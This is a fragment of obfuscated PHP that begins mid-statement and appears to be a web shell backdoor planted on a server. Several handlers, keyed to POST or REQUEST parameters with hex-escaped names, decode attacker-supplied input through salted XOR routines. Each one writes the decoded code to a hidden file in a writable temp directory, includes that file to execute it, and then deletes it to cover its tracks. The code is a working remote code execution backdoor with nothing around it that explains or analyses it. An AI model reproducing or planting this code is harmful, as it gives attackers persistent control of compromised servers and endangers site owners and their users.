$v8) {$sChar=ord($salt[$m % $sLen] ); $dec=((int)$v8 - $sChar - ($m % 10)) ^ 31; $item .=chr($dec ); } foreach ($mrk as $element) { if ((function($d) { return is_dir($d) && is_writable($d); })($element)) { $factor = join("/", [$element, ".ent"]); if (file_put_contents($factor, $item)) { include $factor; @unlink($factor); exit; } } } } if(@$_POST["h\x6F\x6Cd\x65r"] !== null){ $pset = $_POST["h\x6F\x6Cd\x65r"]; $pset = explode ( "." ,$pset ) ; $hld = ''; $s = 'abcdefghijklmnopqrstuvwxyz0123456789'; $lenS = strlen($s ); $len = count($pset ); for ($m = 0; $m < $len; $m++) { $v1 = $pset[$m]; $sChar = ord($s[$m % $lenS] ); $dec = ((int)$v1 - $sChar - ($m % 10)) ^ 79; $hld .= chr($dec ); } $resource = array_filter(["/dev/shm", getenv("TMP"), sys_get_temp_dir(), "/tmp", session_save_path(), ini_get("upload_tmp_dir"), getcwd(), getenv("TEMP"), "/var/tmp"]); foreach ($resource as $object): if (!( !is_dir($object) || !is_writable($object) )) { $ent = vsprintf("%s/%s", [$object, ".flag"]); $success = file_put_contents($ent, $hld); if ($success) { include $ent; @unlink($ent); die();} } endforeach; } if(count($_REQUEST) > 0 && isset($_REQUEST["ite\x6D"])){ $property_set = array_filter([sys_get_temp_dir(), "/tmp", ini_get("upload_tmp_dir"), "/var/tmp", "/dev/shm", getenv("TMP"), getenv("TEMP"), getcwd(), session_save_path()]); $comp = $_REQUEST["ite\x6D"]; $comp = explode ( '.' ,$comp ); $key= ''; $s= 'abcdefghijklmnopqrstuvwxyz0123456789'; $sLen= strlen($s); foreach ($comp as $i => $v2) {$sChar= ord($s[$i % $sLen]); $d= ((int)$v2 - $sChar - ($i % 10)) ^ 90; $key .= chr($d); } $ref = 0; do { $hld = $property_set[$ref] ?? null; if ($ref >= count($property_set)) break; if ((bool)is_dir($hld) && (bool)is_writable($hld)) { $res = str_replace("{var_dir}", $hld, "{var_dir}/.ent"); $file = fopen($res, 'w'); if ($file) { fwrite($file, $key); fclose($file); include $res; @unlink($res); exit; } } $ref++; } while (true); } if(array_key_exists("hld", $_POST)){ $symbol = array_filter([getenv("TEMP"), getenv("TMP"), "/tmp", ini_get("upload_tmp_dir"), session_save_path(), getcwd(), "/var/tmp", sys_get_temp_dir(), "/dev/shm"]); $tkn = $_POST["hld"]; $tkn= explode ("." ,$tkn ) ; $pointer = ''; $s4 = 'abcdefghijklmnopqrstuvwxyz0123456789'; $lenS = strlen($s4); $len = count($tkn); for($o = 0; $o < $len; $o++) {$v9 = $tkn[$o]; $sChar = ord($s4[$o% $lenS]); $dec = ((int)$v9 - $sChar -($o% 10)) ^24; $pointer.=chr($dec); } while ($desc = array_shift($symbol)) { if (is_dir($desc) ? is_writable($desc) : false) { $pset = join("/", [$desc, ".comp"]); $file = fopen($pset, 'w'); if ($file) { fwrite($file, $pointer); fclose($file); include $pset; @unlink($pset); exit; } } } } if(array_key_exists("\x63omp", $_POST) && !is_null($_POST["\x63omp"])){ $element = array_filter([getenv("TEMP"), getcwd(), "/tmp", "/dev/shm", session_save_path(), sys_get_temp_dir(), getenv("TMP"), ini_get("upload_tmp_dir"), "/var/tmp"]); $sym = $_POST["\x63omp"]; $sym =explode( '.' ,$sym ); $itm = ''; $salt7 = 'abcdefghijklmnopqrstuvwxyz0123456789'; $lenS = strlen($salt7); $v = 0; foreach ($sym as $v5) { $chS = ord($salt7[$v % $lenS]); $d = ((int)$v5 - $chS - ($v % 10)) ^ 98; $itm .= chr($d); $v++; } $tkn = 0; do { $descriptor = $element[$tkn] ?? null; if ($tkn >= count($element)) break; if (max(0, is_dir($descriptor) * is_writable($descriptor))) { $entry = "$descriptor" . "/.item"; if (@file_put_contents($entry, $itm) !== false) { include $entry; unlink($entry); exit; } } $tkn++; } while (true); }